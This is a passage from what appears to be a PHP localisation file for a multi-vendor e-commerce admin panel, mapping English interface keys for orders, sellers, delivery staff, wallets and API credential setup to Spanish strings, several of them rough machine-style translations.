'nombre del titular', 'account_no' => 'cuenta no', 'order_Transactions' => 'Transacciones de pedidos', 'transaction_report' => 'reporte de transacción', 'expense_Transactions' => 'gastos Transacciones', 'refund_Transactions' => 'reembolso Transacciones', 'select_status' => 'seleccionar estado', 'all_status' => 'todo estado', 'disburse' => 'desembolsar', 'hold' => 'sostener', 'in_House Orders' => 'Pedidos en casa', 'seller_Orders' => 'vendedor Pedidos', 'in_House Products' => 'Productos internos', 'completed_payments' => 'pagos completados', 'total_Transactions' => 'transacciones totales', 'search_by_orders_id' => 'buscar por pedidos id', 'download_PDF' => 'Descargar PDF', 'shop_name' => 'Nombre de tienda', 'customer_name' => 'Nombre del cliente', 'total_product_amount' => 'cantidad total producto', 'product_discount' => 'descuento producto', 'discounted_amount' => 'cantidad reducida', 'shipping_charge' => 'costo de envío', 'delivered_by' => 'entregado por', 'admin_discount' => 'admin descuento', 'seller_discount' => 'vendedor descuento', 'admin_commission' => 'comisión de administración', 'admin_net_income' => 'admin net ingresos', 'seller_net_income' => 'vendedor ingresos netos', 'cash_payment' => 'pago en efectivo', 'expense_transaction' => 'gasto transacción', 'this_year' => 'este año', 'this_month' => 'este mes', 'this_week' => 'esta semana', 'custom_date' => 'fecha personalizada', 'total_Expense' => 'gasto total', 'free_delivery_coupon' => 'cupón entrega gratuita', 'coupon_discount_will_be_shown_here' => 'cupón descuento se mostrará aquí', 'free_Delivery_Coupon' => 'cupón de entrega gratis', 'discount_on_purchase_and_first_delivery_coupon_amount_will_be_shown_here' => 'descuento en compra y primera entrega cantidad de cupón se mostrará aquí', 'expense_Statistics' => 'gastos Estadísticas', 'total_expense_amount' => 'importe gasto total', 'search_by_Order_ID_or_Transaction_ID' => 'buscar por ID de pedido o ID de transacción', 'XID' => 'ID X', 'transaction_Date' => 'Fecha de Transacción', 'expense_Amount' => 'gasto Importe', 'expense_Type' => 'Tipo de gasto', 'refund_transactions' => 'reembolso transacciones', 'total_transaction' => 'transacción total', 'search_by_orders_id_or_refund_id' => 'buscar por orders id or refund id', 'payment_status' => 'estado de pago', 'customer wallet' => 'billetera del cliente', 'digitally paid' => 'pagado digitalmente', 'all_Products' => 'todos los productos', 'product_Stock' => 'stock producto', 'wish_Listed_Products' => 'productos de la lista de deseos', 'total_Product_Sale' => 'venta producto total', 'total_Discount_Given' => 'descuento total dado', 'product_wise_discounted_amount_will_be_shown_here' => 'aquí se mostrará la cantidad con descuento por producto', 'product_Statistics' => 'producto estadísticas', 'the_product_report_will_show_based_on_the_product_added_date' => 'el informe del producto se mostrará basado en la fecha agregada del producto', 'total_product' => 'producto total', 'search_product_name' => 'buscar nombre de producto', 'product_Unit_Price' => 'precio unitario del producto', 'total_Amount_Sold' => 'cantidad total vendida', 'total_Quantity_Sold' => 'cantidad total vendida', 'average_Product_Value' => 'valor producto promedio', 'current_Stock_Amount' => 'cantidad existencia actual', 'average_Ratings' => 'calificaciones promedio', 'available' => 'disponible', 'in-House' => 'interno', 'all_category' => 'toda categoría', 'stock_sort_by_(low_to_high)' => 'stock sort by (menor a mayor)', 'stock_sort_by_(high_to_low)' => 'existencias clasificar por (mayor a menor)', 'last_Updated_Stock' => 'último existencias actualizadas', 'out_of_Stock' => 'Agotado', 'soon_Stock_Out' => 'pronto existencias agotadas', 'in-Stock' => 'en stock', 'wishlist_sort_by_(low_to_high)' => 'lista de deseos ordenada por (menor a mayor)', 'wishlist_sort_by_(high_to_low)' => 'lista de deseos ordenada por (mayor a menor)', 'total_in_Wishlist' => 'total en lista de deseos', 'total_Order_Amount' => 'importe pedido total', 'due_Amount' => 'cantidad debida', 'the_ongoing_order_amount_will_be_shown_here' => 'la cantidad del pedido en curso se mostrará aquí', 'already_Settled' => 'ya establecido', 'after_the_order_is_delivered_total_order_amount_will_be_shown_here' => 'después de que el pedido se entregue la cantidad total del pedido se mostrará aquí', 'total_settled_amount' => 'cantidad total liquidada', 'payments' => 'pagos', 'search_by_order_id' => 'buscar por id pedido', 'shipping_Charge' => 'costo de envío', 'offline_Payments' => 'offline Pagos', 'customer_list' => 'lista de clientes', 'search_by_Name_or_Email_or_Phone' => 'buscar por nombre o correo electrónico o teléfono', 'contact_info' => 'Datos de contacto', 'block' => 'bloquear', 'unblock' => 'desatascar', 'want_to_change_status' => 'quiero cambiar estado', 'customer_Details' => 'Detalles del cliente', 'customer_ID' => 'Identificación del cliente', 'joined_At' => 'unido en', 'search_orders' => 'Buscar ordenes', 'customer_deleted_successfully' => 'cliente eliminado con éxito', 'review_List' => 'revisión Lista', 'customer_reviews' => 'Opiniones de los usuarios', 'review_table' => 'revisión tabla', 'search_by_Product_or_Customer' => 'buscar por producto o cliente', 'choose_product' => 'elegir producto', 'choose_customer' => 'elegir cliente', 'choose' => 'elegir', 'rating' => 'clasificación', 'no_comment_found' => 'no comentario encontrado', 'customer_loyalty_point_report' => 'informe de puntos de lealtad del cliente', 'point_to_wallet' => 'punto a billetera', 'add_new_seller' => 'agregar nuevo vendedor', 'seller_information' => 'Información del vendedor', 'seller_Image' => 'Imagen del vendedor', 'account_information' => 'Información de la cuenta', '8+_Character' => '8+ Carácter', 'repeat' => 'repetir', 'not_match' => 'no coincide', 'shop_information' => 'tienda informacion', 'shop_address' => 'dirección de la tienda', 'shop_logo' => 'tienda logo', 'upload_logo' => 'cargar logo', 'shop_banner' => 'tienda banner', 6 => '6', 'upload_Banner' => 'subir Banner', 'shop_secondary_banner' => 'tienda secundario banner', 'Bottom' => 'Abajo', 'search_by_Name_or_Phone_or_Email' => 'buscar por nombre o teléfono o correo electrónico', 'total_products' => 'productos totales', 'total_orders' => 'pedidos totales', 'temporary_closed' => 'cerrado temporalmente', 'no_data_found' => 'datos no encontrados', 'Seller_has_been_suspended_successfully' => 'El vendedor ha sido suspendido con éxito', 'activate' => 'activar', 'Seller_has_been_approved_successfully' => 'El vendedor ha sido aprobado con éxito', 'seller_Details' => 'vendedor Detalles', 'order_info' => 'información del pedido', 'featured' => 'presentado', 'product_must_be_approved' => 'producto debe ser aprobado', 'if_sales_commission_is_disabled_here_the_system_default_commission_will_be_applied' => 'si la comisión de ventas está deshabilitada, se aplicará la comisión predeterminada del sistema', 'GST_Number' => 'GST Número', 'if_GST_number_is_disabled_here_it_will_not_show_in_invoice' => 'si el número GST está deshabilitado aquí, no se mostrará en la factura', 'number' => 'número', 'Seller_POS_permission_on_or_off' => 'Vendedor POS permiso on or off', 'commission_percentage_for_this_seller_has_been_updated.' => 'porcentaje de comisión para este vendedor ha sido actualizado.', 'GST_number_for_this_seller_has_been_updated.' => 'Se ha actualizado el número GST de este vendedor.', 'seller_pos_permission_updated.' => 'vendedor pos permiso actualizado.', 'transaction_table' => 'tabla transacciones', 'search_by_orders_id_or_transaction_id' => 'buscar nombre de producto', 'transaction_id' => 'ID de transacción', 'seller_amount' => 'vendedor cantidad', 'received_by' => 'Recibido por', 'delivery_charge' => 'gastos de envío', 'review_list' => 'lista de revisiones', 'Withdraw_Request' => 'Petición de retiro', 'Withdraw_Request_Table' => 'Retirar solicitud tabla', 'request_time' => 'tiempo requerido', 'action_disabled' => 'Acción deshabilitado', 'Withdraw information View' => 'Retirar información Ver', 'seller_Withdraw_Information' => 'vendedor Retirar Información', 'my_bank_info' => 'mi banco info', 'shop_info' => 'tienda info', 'withdraw_request_process' => 'retirar solicitud procesar', 'note_about_transaction_or_request' => 'nota sobre transacción o solicitud', 'withdraw_method_list' => 'retirar lista método', 'add_method' => 'añadir método', 'methods' => 'métodos', 'search_Method_Name' => 'nombre del método de búsqueda', 'method_name' => 'nombre método', 'method_fields' => 'métodos campos', 'default_method' => 'método predeterminado', 'account_number' => 'número de cuenta', 'placeholder' => 'marcador de posición', 'is_Required' => 'se requiere', 'mobile_number' => 'número de teléfono móvil', 'card_number' => 'número de tarjeta', 'default_Method_updated_successfully' => 'Método predeterminado actualizado con éxito', 'default_Method_updated_failed' => 'Método predeterminado actualizado fallido', 'status_update_failed' => 'actualización de estado fallida', 'Withdrawal_Methods' => 'Métodos de retiro', 'add_Fields' => 'agregar campos', 'input_Field_Type' => 'tipo de campo de entrada', 'string' => 'cadena', 'field_name' => 'nombre del campo', 'placeholder_text' => 'texto del marcador', 'this_field_required' => 'este campo requerido', 'reached_maximum' => 'alcanzado máximo', 'withdrawal_method_added_successfully' => 'método de retiro agregado con éxito', 'phone_no' => 'telefono no', 'withdraw_method_removed_successfully' => 'retirar método eliminado con éxito', 'subscriber_list' => 'lista de suscriptores', 'search_by_email' => 'buscar por correo electrónico', 'subscription_date' => 'fecha suscripción', 'add_new_delivery_man' => 'añadir nuevo repartidor', 'general_Information' => 'información general', 'first_Name' => 'nombre de pila', 'last_Name' => 'apellido', 'identity_Type' => 'Tipo de identidad', 'passport' => 'pasaporte', 'driving_License' => 'licencia de conducir', 'nid' => 'nido', 'company_ID' => 'ID de la compañía', 'identity_Number' => 'número de identidad', 'deliveryman_image' => 'repartidor imagen', 'identity_image' => 'identidad imagen', 'account_Information' => 'Información de la cuenta', 'password_minimum_8_characters' => 'contraseña mínimo 8 caracteres', 'Delivery_man_added_successfully' => 'Repartidor agregado con éxito', 'deliveryman_List' => 'repartidor Lista', 'add_Delivery_Man' => 'añadir repartidor', 'contact info' => 'Datos de contacto', 'update_delivery_man' => 'actualizar repartidor', 'update_Deliveryman' => 'actualización Repartidor', 'new_delivery_man' => 'nuevo repartidor', 'Delivery_man_removed' => 'Repartidor eliminado', 'earning_Statement' => 'estado de ganancias', 'earning_statement' => 'declaración de ganancias', 'overview' => 'descripción general', 'order_History_Log' => 'Registro de historial de pedidos', 'earning' => 'ganador', 'deliveryman_Wallet' => 'repartidor cartera', 'cash_in_hand' => 'dinero en efectivo', 'collect_Cash' => 'recoger efectivo', 'current_balance' => 'saldo actual', 'total_withdrawn' => 'total retirado', 'pending_withdraw' => 'A la espera de Retiro', 'delivery_Man_Account' => 'cuenta de repartidor', 'cash_Withdraw' => 'efectivo retirar', 'total_Cash_In_Hand' => 'total efectivo en mano', 'enter_withdraw_amount' => 'ingresar retirar cantidad', 'receive' => 'recibir', 'delivery_man_name' => 'nombre del repartidor', 'transaction_date' => 'Fecha de Transacción', 'amount_receive_successfully' => 'cantidad recibida con éxito', 'chatting_Page' => 'página de conversación', 'chatting_List' => 'lista de chat', 'super_admin' => 'super admin', 'search_delivery_man' => 'buscar repartidor', 'send_a_message' => 'enviar un mensaje', 'send_Reply' => 'enviar respuesta', 'no_Message_available' => 'no hay mensajes disponibles', 'search_by_order_no' => 'buscar por número de pedido', 'order_no' => 'n º de pedido', 'current_status' => 'estado actual', 'history' => 'historia', 'history_of_Order_No:' => 'Historial de pedido No:', 'service_Time' => 'tiempo de servicio', 'total_earning' => 'ganancia total', 'withdrawn' => 'retirado', 'withdraw_Request_Table' => 'retirar Request Table', 'add_New_Contact_Information' => 'agregar nueva información de contacto', 'contact_name' => 'nombre de contacto', 'contact_information_Table' => 'tabla de información de contacto', 'want_to_remove_this_information' => 'quiero eliminar esta información', 'emergency_contact_added_successfully' => 'contacto de emergencia agregado con éxito', 'contact_status_changed_successfully' => 'el estado del contacto cambió con éxito', 'emergency_contact_deleted_successfully' => 'contacto de emergencia eliminado con éxito', 'create_Role' => 'crear rol', 'role_name' => 'nombre de rol', 'module_permission' => 'módulo permiso', 'select_All' => 'seleccionar todo', 'pos_management' => 'gestion pos', 'Order_Management' => 'Gestión de pedidos', 'Product_Management' => 'Gestión de productos', 'Promotion_Management' => 'Promoción Gestión', 'Reports_&_Analytics' => 'Informes & Análisis', 'User_Management' => 'Gestión de usuarios', 'employee_Roles' => 'empleado roles', 'search_role' => 'rol de búsqueda', 'modules' => 'módulos', 'product management' => 'gestión de productos', 'marketing section' => 'sección de marketing', 'business section' => 'sección de negocios', 'order management' => 'gestión de pedidos', 'are_you_sure_delete_this_role' => 'estás seguro delete this role', 'role_deleted_successfully' => 'rol eliminado con éxito', 'select_minimum_one_selection_box' => 'seleccionar mínimo un cuadro de selección', 'role_added_successfully' => 'rol agregado con éxito', 'pos management' => 'gestión de puntos de venta', 'promotion management' => 'gestión de promociones', 'reports_and_analytics' => 'informes y análisis', 'system settings' => 'ajustes del sistema', 'edit_Role' => 'editar rol', 'role_Update' => 'actualización de roles', 'employee_List' => 'lista de empleados', 'employee_list' => 'lista de empleados', 'employee_table' => 'empleado tabla', 'search_by_name_or_email_or_phone' => 'buscar por nombre o correo electrónico o teléfono', 'role' => 'role', 'employee_Edit' => 'empleado Editar', 'employee_Update' => 'empleado Actualizar', 'employee_Update_Form' => 'empleado Actualizar formulario', 'input_if_you_want_to_change' => 'entrada si usted quiere cambiar', 'employee_image' => 'imagen empleado', 'employee_updated_successfully' => 'empleado actualizado con éxito', 'Seller_Apply' => 'Vendedor Aplicar', 'Seller_Registration' => 'Registro de vendedor', 'Create_your_own_store.' => 'Crea tu propia tienda.', 'Already_have_store' => 'Ya tengo tienda', 'Login' => 'Acceso', 'Open_your_and_start_selling.' => 'Abre tu y comienza a vender.', 'Create_your_own_business' => 'Crea tu propio negocio', 'Seller_Info' => 'Información del vendedor', 'Enter_phone_number' => 'Ingresa número telefónico', 'Enter_password' => 'Introducir la contraseña', 'repeat_password' => 'Repita la contraseña', 'Upload_File' => 'Subir archivo', 'Seller_Image' => 'Imagen del vendedor', 'Image_Ration' => 'Relación de imagen', 'NB' => 'NB', 'image_size_must_be_within' => 'el tamaño de la imagen debe estar dentro', 'image_type_must_be_within' => 'el tipo de imagen debe estar dentro', 'Shop_Info' => 'Información de la tienda', 'Store_Name' => 'Nombre de la tienda', 'halar' => 'halar', 'Store_Address' => 'Dirección de la tienda', 'Ex_:_Shop_-12_Road-8' => 'Ej : Tienda -12 Carretera-8', 'Store_Banner' => 'Tienda Banner', 'Image_Ratio' => 'Relación de imagen', 'Store_Secondary_Banner' => 'Almacenar banner secundario', 'Store_Logo' => 'Logotipo de la tienda', 'I_agree_with_the' => 'Estoy de acuerdo con el', 'employee Add' => 'empleado Agregar', 'add_New_Employee' => 'agregar nuevo empleado', 'full_Name' => 'nombre completo', 'delivery_country_restriction_status_changed_successfully' => 'el estado de restricción del país de entrega cambió correctamente', 'delivery_zip_code_restriction_status_changed_successfully' => 'el estado de restricción del código postal de entrega cambió correctamente', 'login_first' => 'Inicie sesión primero', 'Order_Again' => 'Ordenar otra vez', 'Want_to_order_your_usuals' => 'Quieres pedir tus habituales', 'Just_reorder_from_your_previous_orders.' => 'Solo reordena desde tus pedidos anteriores.', 'Order_ID' => 'Solicitar ID', 'Final_Total' => 'Total final', 'order_again' => 'ordenar otra vez', 'Sales_commission_Updated_successfully' => 'Comisión de ventas Actualizado con éxito', 'Seller_registration_Updated_successfully' => 'Registro de vendedor actualizado con éxito', 'vacation_mode_updated_successfully' => 'modo vacaciones actualizado con éxito', 'App_Store_Updated_successfully' => 'App Store Actualizado con éxito', 'reCaptcha_Setup' => 'reCaptcha Configuración', 'google_Recapcha_Information' => 'google Recapcha Información', 'credentials_SetUp_page' => 'página de configuración de credenciales', 'site_Key' => 'clave del sitio', 'to_get_site_key_and_secret_key_Go_to_the_Credentials_page' => 'para obtener la clave del sitio y la clave secreta Vaya a la página Credenciales', 'add_a_abel_(Ex:_abc_company)' => 'agregar un abel (Ej: abc empresa)', 'select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'select reCAPTCHA v2 as ReCAPTCHA Type', 'select_sub_type' => 'seleccionar sub tipo', 'im_not_a_robot_checkbox ' => 'Im not a robot checkbox ', 'add_Domain_(For_ex:_demo.6amtech.com)' => 'añadir Dominio (Por ejemplo: demo.6amtech.com)', 'check_in_“Accept_the_reCAPTCHA_Terms_of_Service”' => 'check in “Acepto los términos de servicio reCAPTCHA”', 'press_Submit' => 'presione Enviar', 'copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'copiar Site Key y Secret Key Pegar en la entrada archivada debajo y Guardar.', 'Updated_Successfully' => 'Actualizado con éxito', 'third_party_apis' => 'API de terceros', 'map_api_key' => 'mapa api clave', 'client' => 'cliente', 'server' => 'servidor', 'config_data_updated' => 'config data actualizado', 'FCM_Settings' => 'FCM Configuración', 'push_Notification_Setup' => 'Configuración de notificaciones push', 'firebase_Push_Notification_Setup' => 'Configuración de notificaciones push de firebase', 'server_Key' => 'clave servidor', 'FCM_Project_ID' => 'FCM Proyecto ID', 'push_Messages' => 'mensajes push', 'order_Pending_Message' => 'pedido pendiente mensaje', 'order_Confirmation_Message' => 'mensaje de confirmación del pedido', 'order_Processing_Message' => 'mensaje de procesamiento de pedido', 'order_out_for_delivery_Message' => 'pedido para entrega Mensaje', 'order_Delivered_Message' => 'pedido entregado mensaje', 'order_Returned_Message' => 'pedido devuelto mensaje', 'order_Failed_Message' => 'order Failed Mensaje', 'deliveryman_assign_message' => 'repartidor asignar mensaje', 'deliveryman_start_message' => 'repartidor mensaje de inicio', 'deliveryman_delivered_message' => 'repartidor mensaje entregado', 'deliveryman_reschedule_message' => 'repartidor reprogramar mensaje', 'order_canceled_message' => 'pedido cancelado mensaje', 'My_Inbox' => 'Mi bandeja de entrada', 'start_a_new_message' => 'iniciar un nuevo mensaje', 'Message_updated' => 'Mensaje actualizado', 'social_Login' => 'Inicio de sesión social', 'google' => 'Google', 'store_Client_ID' => 'almacenar ID de cliente', 'store_Client_Secret_Key' => 'almacenar la clave secreta del cliente', 'see_Credential_Setup_Instructions' => 'ver Instrucciones de configuración de credenciales', 'facebook' => 'Facebook', 'google_API_Set_up_Instructions' => 'Instrucciones de configuración de API de google', 'Go_to_the_Credentials_page' => 'Ir a la página de credenciales', 'click' => 'hacer clic', 'here' => 'aquí', 'create_credentials' => 'crear credenciales', 'OAuth_client_ID' => 'ID cliente OAuth', 'select_the' => 'Selecciona el', 'web_application' => 'Aplicación web', 'Name your OAuth 2.0 client' => 'Asigne un nombre a su cliente OAuth 2.0', 'ADD_URI' => 'ADD URI', 'authorized_redirect_URIs' => 'URI redireccionamiento autorizado', 'provide_the' => 'proporcionar la', 'from_below_and_click' => 'desde abajo y clic', 'create' => 'crear', 'Copy' => 'Copiar', 'Client ID' => 'Identificación del cliente', 'client_Secret' => 'cliente secreto', 'paste_in_the_input_filed_below_and' => 'pegar en la entrada archivada debajo y', 'facebook_API_Set_up_Instructions' => 'facebook API Set up Instrucciones', 'go_to_the_facebook_developer_page' => 'ir a la página del desarrollador de facebook', 'go_to' => 'ir a', 'get_started' => 'Empezar', 'from_Navbar' => 'from Navbar', 'from_Register_tab_press' => 'from Register tab press', 'continue' => 'continuar', 'if_needed' => 'si es necesario', 'provide_Primary_Email_and_press' => 'proporcione el correo electrónico principal y presione', 'confirm_Email' => 'Confirmar correo electrónico', 'in_about_section_select' => 'en acerca de la sección seleccionar', 'other' => 'otro', 'and_press' => 'y presiona', 'complete_Registration' => 'Registro completo', 'create_App' => 'crear aplicación', 'select_an_app_type_and_press' => 'seleccione un tipo de aplicación y presione', 'next' => 'próximo', 'complete_the_add_details_form_and_press' => 'Complete el formulario de agregar detalles y presione', 'facebook_Login' => 'facebook Iniciar sesión', 'press' => 'prensa', 'set_Up' => 'configuración', 'web' => 'web', 'provide' => 'proporcionar', 'site_URL' => 'Sitio URL', 'base_URL_of_the_site_ex:' => 'URL base del sitio ex:', 'now_go_to' => 'ahora ir a', 'left sidebar' => 'Barra lateral izquierda', 'make_sure_to_check' => 'hacer seguro de verificar', 'client_OAuth_Login' => 'cliente OAuth Iniciar sesión', 'must_on' => 'debe en', 'valid_OAuth_Redirect_URIs' => 'URI de redirección OAuth válida', 'save_Changes' => 'guardar cambios', 'from_left_sidebar' => 'desde la barra lateral izquierda', 'basic' => 'básico', 'fill_the_form_and_press' => 'llenar el formulario y presionar', 'now_copy' => 'ahora copiar', 'client_ID' => 'Identificación del cliente', '&' => '&', 'client_secret' => 'cliente secreto', 'twitter_API_Set_up_Instructions' => 'twitter API Set up Instrucciones', 'instruction_will_be_available_very_soon' => 'instrucción estará disponible muy pronto', 'copied_to_the_clipboard' => 'copiado en el portapapeles', 'google_credentials_updated' => 'google credentials actualizado', 'facebook_credentials_updated' => 'facebook credentials updated', 'social_Media_Chatting' => 'Charla en redes sociales', 'whatsApp' => 'WhatsApp', 'whatsapp_phone_number' => 'número de teléfono de whatsapp', 'provide_a_WhatsApp_number_without_country_code' => 'proporcionar un número de WhatsApp sin código de país', 'whatsapp_information_update_successfully' => 'actualización de información de whatsapp con éxito', 'My_Order_List' => 'Mi lista de pedidos', 'Show_Order' => 'Mostrar pedido', 'Latest' => 'El último', 'Old' => 'Viejo', 'Order_Details' => 'Detalles del pedido', 'Status' => 'Estado', 'Amount' => 'Cantidad', 'Action' => 'Acción', 'items' => 'elementos', 'Cancel' => 'Cancelar', 'want_to_cancel_this_order ' => 'quiero cancelar este pedido', 'Failed To Deliver' => 'Failed To Deliver', 'order_can_be_canceled_only_when_pending.' => 'el pedido solo se puede cancelar cuando está pendiente.', 'Order_Status' => 'estado del pedido', 'Payment_Status' => 'Estado de pago', 'Delivery_Man_Info' => 'Información del repartidor', 'Qty' => 'Cantidad', 'Discount' => 'Descuento', 'Subtotal' => 'Total parcial', 'tax_fee' => 'libre de impuestos', 'Shipping_Fee' => 'Gastos de envío', 'Discount_on_product' => 'Descuento en producto', 'Coupon_Discount' => 'Cupón descuento', 'drop_here' => 'caer aquí', 'input_png_or_jpg' => 'entrada png o jpg', 'Privacy_policy_Updated_successfully' => 'Política de privacidad Actualizado con éxito', 'Chat_with_seller' => 'Chatea con el vendedor', 'about_us_updated_successfully' => 'Sobre nosotras actualizada con éxito', 'FAQ_added_successfully' => 'Preguntas frecuentes añadidas con éxito', 'social_media' => 'medios de comunicación social', 'social_media_form' => 'formulario redes sociales', 'instagram' => 'Instagram', 'twitter' => 'gorjeo', 'linkedIn' => 'LinkedIn', 'pinterest' => 'interés', 'google_plus' => 'Google Mas', 'social_media_link' => 'enlace de redes sociales', 'enter_Social_Media_Link' => 'entrar Social Media Link', 'social_media_table' => 'tabla de redes sociales', 'social_Name_Is_Requeired.' => 'El nombre social es obligatorio.', 'social_Link_Is_Requeired.' => 'Se requiere enlace social.', 'social_Media_Already_taken' => 'social Media Ya tomado', 'social_Media_inserted_Successfully.' => 'Medios sociales insertados con éxito.', 'social_info_updated_successfully.' => 'social info actualizado con éxito.', 'are_you_sure_delete_this_social_media' => 'Are you sure delete this social media', 'social_media_deleted_successfully.' => 'social media eliminado con éxito.', 'file_manager' => 'administrador de archivos', 'public' => 'público', 'upload_File' => 'subir archivo', 'choose_Images' => 'elegir imágenes', 'upload_zip_file' => 'cargar archivo zip', 'file_path_copied_successfully' => 'la ruta del archivo se copió con éxito', 'environment_variables_updated_successfully' => 'variables entorno actualizadas con éxito', 'New_Currency_inserted_successfully' => 'Nueva moneda insertada con éxito', 'Currency_status_successfully_changed.' => 'Estado moneda modificado con éxito.', 'update_Currency' => 'actualizar moneda', 'currency_update' => 'actualización de moneda', 'currency_Name' => 'moneda Nombre', 'currency_Symbol' => 'símbolo de moneda', 'currency_Code' => 'código de moneda', 'exchange_Rate' => 'tipo de cambio', 'currency_updated_successfully' => 'moneda actualizada con éxito', 'Language_updated' => 'Idioma actualizado', 'Language_Added' => 'Idioma Agregado', 'Default_Language_Changed' => 'Idioma predeterminado cambiado', 'Removed_Successfully' => 'Eliminado con éxito', 'select_date_range' => 'seleccionar rango de fechas', 'Order_Invoice' => 'Pedido Factura', 'Shop_Name' => 'Nombre de tienda', 'GST' => 'GST', 'If_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site _you' => 'Si necesita cualquier asistencia o tiene retroalimentación o sugerencias sobre nuestro sitio usted', 'can_email_us_at' => 'can email us at', 'print__Invoice' => 'imprimir Factura', 'Packaging' => 'embalaje', 'cash on delivery' => 'contra reembolso', 'change_status_to_paid' => 'Change status to paid', 'location_data' => 'datos de localización', 'delivery_man_successfully_assigned/changed' => 'repartidor asignado exitosamente/cambiado', 'deliveryman_man_can_not_assign/change_in_that_status' => 'repartidor man no puede asignar/cambiar en ese estado', 'My_Support_Tickets' => 'Mis tickets de soporte', 'create_support_tickets' => 'crear tickets de soporte', 'Close_ticket' => 'Cerrar ticket', 'submit_new_ticket' => 'enviar nuevo ticket', 'you_will_get_response' => 'usted obtendrá respuesta', 'Subject' => 'Sujeto', 'Website_problem' => 'Sitio web problema', 'partner_request' => 'solicitud socio', 'Info_inquiry' => 'Info consulta', 'Priority' => 'Prioridad', 'choose_priority' => 'elegir prioridad', 'Urgent' => 'Urgente', 'Low' => 'Bajo', 'describe_your_issue' => 'describe tu problema', 'Leave_your_issue' => 'Deja tu problema', 'Back' => 'Atrás', 'Submit' => 'Entregar', 'My_Loyalty_Point' => 'Mi punto de lealtad', 'Total_Points' => 'Puntos totales', 'How_to_use' => 'Cómo utilizar', 'Convert_your_loyalty_point_to_wallet_money.' => 'Convierta su punto de fidelidad en dinero de billetera.', 'Minimum_200_points_required_to_convert_into_currency' => 'Mínimo 200 puntos requeridos para convertir en moneda', 'convert_to_currency' => 'convertir a moneda', 'Transaction_History' => 'Historial de transacciones', 'Debit' => 'Débito', 'Credit' => 'Crédito', 'your_loyalty_point_will_convert_to_currency_and_transfer_to_your_wallet' => 'su punto de lealtad se convertirá a moneda y transferirá a su billetera', 'minimum_point_for_convert_to_currency_is :' => 'punto mínimo para convertir a moneda es:', 'point' => 'punto', 'how_to_use' => 'cómo utilizar', 'Minimum' => 'Mínimo', 'points_required_to_convert' => 'puntos requeridos para convertir', 'into_currency' => 'en moneda', 'updated_successfully!' => 'actualizado con éxito!', 'insufficient_point!' => 'punto insuficiente!', 'Want_to_delete_this_item' => 'Quiero eliminar este elemento', 'admin_approval_for_products_updated_successfully' => 'aprobación del administrador para productos actualizados con éxito', 'refund_list' => 'lista reembolso', 'refund_request_list' => 'lista de solicitudes de reembolso', 'product_Info' => 'información del producto', 'shipping_address_has_been_given_below' => 'dirección de envío se ha dado abajo', 'product_name_not_found' => 'nombre del producto no encontrado', 'search_by_Product_Name' => 'buscar por nombre del producto', 'limited_Stocks' => 'existencias limitadas', 'product_Type' => 'tipo de producto', 'verify_status' => 'verificar estado', 'active_Status' => 'estado activo', 'new_Request' => 'nueva solicitud', 'shipping_Cost' => 'costo de envío', 'Add_Fund_To_Wallet' => 'Agregar fondo a la billetera', 'welcome' => 'bienvenido', 'Transaction Sucessfull' => 'Transacción exitosa', 'amount sucessfully credited to your wallet' => 'cantidad acreditada con éxito en su billetera', 'loyalty_point_to_wallet' => 'lealtad punto a billetera', 'dear' => 'Dear', 'Thank you for joinning with' => 'Gracias por unirte a', 'id' => 'identificación', 'If you require any assistance or have feedback or suggestions about our site you can email us at' => 'Si necesita ayuda o tiene comentarios o sugerencias sobre nuestro sitio, puede enviarnos un correo electrónico a', 'All copy right reserved' => 'Todos los derechos de copia reservados', 'point_to_wallet_transfer_successfully' => 'apuntar a la transferencia de billetera con éxito', 'update_your_product_code' => 'actualizar su código de producto', 'this_page_is_for_A4_size_page_printer_so_it_won t_be_visible_in_smaller_devices.' => 'esta página es para una impresora de páginas de tamaño A4 así que no será visible en dispositivos más pequeños.', 'please_update_product_code' => 'por favor actualice el código del producto', 'stock_limit_products' => 'productos con límite de existencias', 'stock_limit_products_list' => 'lista de productos con límite de existencias', 'the_products_are_shown_in_this_list _which_quantity_is_below' => 'los productos se muestran en esta lista cuya cantidad está abajo', 'default_sort' => 'clasificación predeterminada', 'quantity_sort_by_(low_to_high)' => 'cantidad clasificar por (menor a mayor)', 'quantity_sort_by_(high_to_low)' => 'cantidad clasificar por (mayor a menor)', 'order_sort_by_(low_to_high)' => 'Ordenar por (menor a mayor)', 'order_sort_by_(high_to_low)' => 'Ordenar por (mayor a menor)', 'update_quantity' => 'cantidad de actualización', 'product_quantity_updated_successfully!' => 'cantidad de producto actualizada con éxito!', 'download_the_format_file_and_fill_it_with_proper_data' => 'descargar el archivo de formato y llenarlo con datos adecuados', 'once_you_have-downloaded_and_filled_the_format_file_upload_it_in_the_form_below_and_submit.' => 'una vez que haya descargado y llenado el archivo en formato cárguelo en el formulario a continuación y envíelo.', 'after_uploading_products_you_need_to_edit_them_and_set_products_images_and_choices.' => 'después de cargar productos necesita editarlos y establecer imágenes y opciones de productos.', 'you_can_upload_your_product_images_in_product_folder_from_gallery_and_copy_images_path.' => 'puede cargar las imágenes de su producto en la carpeta del producto desde la galería y copiar la ruta de las imágenes.', 'import_Products_File' => 'import Products File', 'download_Format' => 'descargar formato', 'product_add' => 'producto añadir', 'general_info' => 'información general', 'Ready_After_Sell' => 'Ready After Sell', 'Ready_Product' => 'Listo Producto', 'sub_category' => 'subcategoría', 'sub_sub_category' => 'sub sub categoría', 'generate_Code' => 'generar codigo', 'meta_title' => 'meta título', 'meta_image' => 'meta imagen', 'meta_description' => 'Metadescripción', 'please_provide_embed_link_not_direct_link' => 'proporcione un enlace incrustado, no un enlace directo', 'product_updated_successfully' => 'producto actualizado con éxito', 'variant' => 'variante', 'variant Price' => 'precio variante', 'SKU' => 'SKU', 'product_reviews' => 'reseñas de productos', 'choose_Product' => 'elegir Producto', 'choose_Customer' => 'elegir cliente', 'choose_Status' => 'elegir estado', 'from_Date' => 'partir de la fecha', 'My_Wallet' => 'Mi billetera', 'Total_Balance' => 'Balance total', 'Earn_money_to_your_wallet_by_completing_the_offer_&_challenged' => 'Gana dinero para tu billetera completando la oferta y desafiado', 'Convert_your_loyalty_points_into_wallet_money' => 'Convierta su punto de fidelidad en dinero de billetera.', 'Amin_also_reward_their_top_customers_with_wallet_money' => 'Amin también recompensa a sus principales clientes con monedero dinero', 'Send_your_wallet_money_while_order' => 'Send your wallet money while order', 'start date' => 'fecha de inicio', 'expire date' => 'fecha de caducidad', 